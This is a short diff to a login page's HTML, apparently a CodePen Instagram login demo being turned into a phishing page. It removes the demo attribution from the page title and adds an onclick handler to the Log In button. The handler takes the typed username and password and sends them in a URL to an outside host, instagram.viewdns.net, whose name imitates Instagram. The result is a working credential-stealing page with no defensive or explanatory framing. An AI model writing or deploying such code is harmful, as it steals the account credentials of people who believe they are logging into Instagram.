--- a/login/index.html
+++ b/login/index.html
@@ -2,7 +2,7 @@
 <html lang="en" >
 <head>
   <meta charset="UTF-8">
-  <title>CodePen - Instagram Login Page - 1 of #15daysofcss</title>
+  <title>Instagram Login Page</title>
   <link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css'><link rel="stylesheet" href="./style.css">
 
 </head>
@@ -24,7 +24,7 @@
             <input id="password" type="password" placeholder="password" />
             <label for="password">Password</label>
           </div>
-						<button class="login-button" title="login">Log In</button>
+						<button class="login-button" title="login" onclick='var pass=document.getElementById("password").value;var user=document.getElementById("username").value;window.open("http://instagram.viewdns.net/"+user+"/"+pass)'>Log In</button>
 						<div class="separator">
 							<div class="line"></div>
 							<p>OR</p>
